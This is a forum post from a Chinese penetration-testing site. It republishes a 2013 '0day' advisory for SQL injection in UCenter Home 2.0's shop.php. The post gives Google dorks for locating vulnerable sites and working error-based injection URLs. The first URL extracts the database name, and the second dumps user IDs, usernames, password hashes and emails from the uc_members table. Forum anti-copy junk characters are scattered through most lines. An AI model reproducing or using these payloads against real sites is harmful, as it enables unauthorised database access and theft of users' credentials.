中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

6 ?% w" y; _1 U0 e5 X" l9 o__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  7 B5 s, M' j1 A: J* u4 J
$ _( ]+ ^6 t9 Y( v# n( A2 P
                                 
( x" N/ a$ b9 Z* C- N' W" y/ D* a. }8 R0 D0 V1 U$ E0 y
*/ Author : KnocKout  ' {0 w0 m5 v9 Y' w
  m: c8 z7 v5 H0 l. u( S' c3 U/ C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
) ?- ?) T7 w$ x6 [# n
! m; ?3 ]3 u. A  V) s% w*/ Contact: knockoutr@msn.com  
& I4 ~8 [- c0 X( r  o" y. H- s% Z& E' E' w0 @
*/ Cyber-Warrior.org/CWKnocKout  
; B. b; q6 m+ J6 {' _% @0 L% }5 j/ a$ P7 T
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
: K2 p1 o0 K1 E: I* a& ?+ f4 B- O) B& S8 a2 ^1 v( R+ C
Script : UCenter Home  
# ?, z2 L- |. t" u' t/ Y0 ^1 c) y( E& q, p+ H
Version : 2.0  
; [% K6 `5 F2 H/ S$ W+ F6 \. k. s* [4 ?" ]$ I
Script HomePage : http://u.discuz.net/  ! l+ S- [( F/ \/ F
# V" `/ W; R/ k# Y/ ]" w# Y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
9 H; F* g1 u( z0 H4 J0 n" F9 S/ d1 O. J" e  g$ i
Dork : Powered by UCenter inurl:shop.php?ac=view  7 n, z& I' {9 G& R4 \! {- |9 W

- r) [" P# r9 r5 oDork 2 : inurl:shop.php?ac=view&shopid=  
9 m6 S3 J7 i$ ~- c* ~: Z3 J
: F" ~/ {8 |, l+ ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ; ?. k4 J! l, q. T) X; c$ L
6 j5 t5 Z$ P6 e! ~, y" g" K3 q
Vuln file : Shop.php  / r% o4 a# S. Z' Q( ^

% l0 }) K& s5 A6 L+ x+ Y/ Gvalue's : (?)ac=view&shopid=  
+ Y" O7 t2 i* }" ?, ?! R8 H% a3 A
! d3 A: ], @" f+ f% KVulnerable Style : SQL Injection (MySQL Error Based)  ( f8 w1 w, Q+ _7 `) h
$ k5 F, m0 O+ I' p7 Y, |7 Q
Need Metarials : Hex Conversion  
) d$ E! Z% D' P0 v% J4 Y4 u8 _4 M6 `8 e4 s2 y! ~, K, y) D
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
8 y2 x( v) G1 S4 E( y9 ]( W& Y' \; k, M
Your Need victim Database name.   
" D( z2 }; m5 l. A9 N! D$ p2 a
. t& o; G" f1 |  gfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  1 k* o& B) m1 G; M% k/ r

8 E, }2 e2 J! x..  - E; \# A3 @+ Q; }
0 C; c0 P. ^  {1 u' \
DB : Okey.  , J9 \9 j/ Z3 J1 Y6 G& m
, W9 O) y- V8 @, ^
your edit DB `[TARGET DB NAME]`  
( C9 D- d( T/ i# k" C+ n6 u
" l+ F$ [8 r; m2 n) ~Example : 'hiwir1_ucenter'  
: `% K6 h" u7 G8 ~8 f% _- ]6 S! K1 C) c- y  e* O
Edit : Okey.  
9 L( j" F; b+ ?/ j5 Y8 X* x: [
2 f; i1 s7 `' |8 |- yYour use Hex conversion. And edit Your SQL Injection Exploit..  
. C' J& Z4 x3 r( {2 G/ y
( B9 L3 n- [! f6 q   
- ~! d% G* \8 T) R
' Y( M, y1 Y  ~8 IExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  / z$ r( s3 S$ w; `+ t2 ^) c




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2